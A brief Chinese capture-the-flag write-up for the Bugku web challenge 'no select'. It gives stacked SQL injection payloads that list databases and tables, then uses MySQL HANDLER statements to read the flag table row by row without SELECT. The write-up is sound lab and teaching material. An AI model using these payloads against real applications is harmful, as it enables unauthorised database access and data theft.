Bugku-Web题目-no select
是一个sql注入的题目,看题目叫做no selection 应该是把select给过滤了
这道题有两个解法,一个是万能密码一把梭,另一个就是老老实实手动注入,sqlmap 是出不来flag的。
首先开始展示万能密码解法:
那么接下来就开始手动注入的解法吧,这里使用堆叠注入
数据库:
-1';show databases;#
表名:
-1';use flag;show tables;#
逐行提取表格数据:
-1';use flag;handler flag open as flag;handler flag read first;handler flag read next;#
下一行
-1';use flag;handler flag open as flag;handler flag read first;handler flag read next;handler flag read next;#
下一行:
-1';use flag;handler flag open as flag;handler flag read first;handler flag read next;handler flag read next;handler flag read next;#
下一行:
-1';use flag;handler flag open as flag;handler flag read first;handler flag read next;handler flag read next;handler flag read next;handler flag read next;#
下一行:
-1';use flag;handler flag open as flag;handler flag read first;handler flag read next;handler flag read next;handler flag read next;handler flag read next;handler flag read next;#
下一行:出flag!
-1';use flag;handler flag open as flag;handler flag read first;handler flag read next;handler flag read next;handler flag read next;handler flag read next;handler flag read next;handler flag read next;#